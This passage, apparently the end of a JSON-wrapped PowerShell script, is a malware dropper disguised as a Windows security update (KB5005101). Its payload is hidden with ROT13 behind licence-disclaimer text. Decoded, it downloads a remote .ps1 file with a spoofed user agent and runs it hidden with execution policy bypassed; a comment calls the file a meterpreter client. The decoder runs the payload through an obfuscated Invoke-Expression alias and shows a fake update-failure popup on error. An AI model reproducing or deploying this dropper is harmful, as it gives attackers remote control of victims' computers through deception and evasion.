QVFPYNVZRQ. VA AB RIRAG FUNYY GUR ERTRAGF BE PBAGEVOHGBEF OR YVNOYR SBE NAL QVERPG, VAQVERPG, VAPVQRAGNY, FCRPVNY, RKRZCYNEL, BE PBAFRDHRAGVNY QNZNTRF (VAPYHQVAT, OHG ABG YVZVGRQ GB, CEBPHERZRAG BS FHOFGVGHGR TBBQF BE FREIVPRF; YBFF BS HFR, QNGN, BE CEBSVGF; BE OHFVARFF VAGREEHCGVBA) UBJRIRE PNHFRQ NAQ BA NAL GURBEL BS YVNOVYVGL, JURGURE VA PBAGENPG, FGEVPG YVNOVYVGL, BE GBEG (VAPYHQVAT ARTYVTRAPR BE BGUREJVFR) NEVFVAT VA NAL JNL BHG BS GUR HFR BS GUVF FBSGJNER, RIRA VS NQIVFRQ BS GUR CBFFVOVYVGL BS FHPU QNZNTR.`\",6,`\" Frpher XO4569132 Hcqngr`\",1+0)}\r\nvje -Hev `\"uggc://CharlieBrown/Hcqngr-XO5005101.cf1`\" -BhgSvyr `\"`$BhgSvyr`\" -HfreNtrag `\"Zbmvyyn/5.0 (Naqebvq; Zbovyr; ei:40.0) Trpxb/40.0 Sversbk/40.0`\"|Bhg-Ahyy\r\n\r\nFgneg-Fyrrc -Zvyyvfrpbaqf 300;`$n = Trg-Qngr\r\ngel{#Rkrphgr zrgrecrgre pyvrag.cf1 va n puvyq cebprff qrgnpu sebz cnerag cebprff (onpxtebhaq)\r\n Fgneg-Cebprff cbjrefuryy.rkr -JvaqbjFglyr Uvqqra -NethzragYvfg `\"-rkrp olcnff -Svyr `$BhgSvyr`\"|Bhg-Ahyy\r\n}pngpu{}\");$rdata = $null\r\n$Rotten13.ToCharArray() | ForEach-Object {If((([int] $_ -ge 97) -and ([int] $_ -le 109)) -or (([int] $_ -ge 65) -and ([int] $_ -le 77))){$rdata += [char] ([int] $_ + 13)}ElseIf((([int] $_ -ge 110) -and ([int] $_ -le 122)) -or (([int] $_ -ge 78) -and ([int] $_ -le 90))){$rdata += [char] ([int] $_ - 13)}Else{$rdata += $_}}\r\ntry{echo \"$rdata\"|&(DIR Alias:/I*X)}catch{powershell (New-Object -ComObject Wscript.Shell).Popup(\"Fail to execute KB5005101.exe Update Package\",5,\" KB5005101 Security Update\",0+16)}\r\n\r\n\r\n" } ]